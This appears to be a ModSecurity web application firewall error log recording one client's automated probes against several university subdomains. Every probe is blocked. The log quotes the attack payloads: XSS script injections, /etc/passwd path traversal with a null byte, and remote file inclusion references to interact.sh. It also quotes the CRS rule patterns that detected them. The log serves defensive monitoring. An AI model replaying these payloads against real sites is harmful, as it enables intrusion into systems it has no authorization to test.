[Tue Aug 29 11:52:52.868173 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAoXJsAAAAAP"]
[Tue Aug 29 11:52:52.874929 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pMCo-f0AAAoT7RsAAAAD"]
[Tue Aug 29 11:52:52.885097 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pMCo-f0AAAocyeIAAAAR"]
[Tue Aug 29 11:52:53.581449 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/logout"] [unique_id "ZO15pcCo-f0AAAnHQqYAAAAT"]
[Tue Aug 29 11:52:53.599521 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://? found within ARGS:redirect_to: http://?1</sCripT><sCripT>alert(document.domain)</sCripT>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15pcCo-f0AAAoLfNQAAAAG"]
[Tue Aug 29 11:52:53.620583 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mes. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:mes: </script>\\x22><script>alert(123)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php"] [unique_id "ZO15pcCo-f0AAAnHQqcAAAAT"]
[Tue Aug 29 11:52:53.667777 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:loginMode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:loginMode: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/MicroStrategyLibrary/auth/ui/loginPage"] [unique_id "ZO15pcCo-f0AAAnTlXoAAAAA"]
[Tue Aug 29 11:52:54.601201 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/register"] [unique_id "ZO15psCo-f0AAAoZ6PoAAAAK"]
[Tue Aug 29 11:52:54.920801 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/user/resend-activation"] [unique_id "ZO15psCo-f0AAAoZ6PwAAAAK"]
[Tue Aug 29 11:52:55.449711 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoZ6P4AAAAK"]
[Tue Aug 29 11:52:55.729504 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoPuaMAAAAM"]
[Tue Aug 29 11:52:55.821435 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAnHQqsAAAAT"]
[Tue Aug 29 11:52:55.829603 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAlUlyIAAAA0"]
[Tue Aug 29 11:52:55.860981 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoW7LIAAAAJ"]
[Tue Aug 29 11:52:55.867748 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAnHQqwAAAAT"]
[Tue Aug 29 11:52:55.881320 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoPuaYAAAAM"]
[Tue Aug 29 11:52:55.916717 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15p8Co-f0AAAoZ6QMAAAAK"]
[Tue Aug 29 11:52:55.927118 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAnHQq0AAAAT"]
[Tue Aug 29 11:52:55.934602 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15p8Co-f0AAAofm20AAAAX"]
[Tue Aug 29 11:52:55.982866 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15p8Co-f0AAAoesJQAAAAV"]
[Tue Aug 29 11:52:56.003609 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAnTlX8AAAAA"]
[Tue Aug 29 11:52:56.004055 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAlUlyUAAAA0"]
[Tue Aug 29 11:52:56.016505 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAoLfOEAAAAG"]
[Tue Aug 29 11:52:56.035683 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAoPuaoAAAAM"]
[Tue Aug 29 11:52:56.037444 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:rsd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:rsd: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15qMCo-f0AAAnd3PIAAAAI"]
[Tue Aug 29 11:52:56.042970 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:")',10000000);alert(1337);setTimeout('alert(". [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22)',10000000);alert(1337);setTimeout('alert(\\x22: \\x22)',10000000);alert(1337);setTimeout('alert(\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/www/delivery/afr.php"] [unique_id "ZO15qMCo-f0AAAnHQq4AAAAT"]
[Tue Aug 29 11:52:56.085664 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15qMCo-f0AAAmQ-4MAAAAb"]
[Tue Aug 29 11:52:57.770982 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15qcCo-f0AAAoPua4AAAAM"]
[Tue Aug 29 11:52:58.197190 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAoPua8AAAAM"]
[Tue Aug 29 11:52:58.452436 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:data[performredirect]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:data[performredirect]: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15qsCo-f0AAAlUlysAAAA0"]
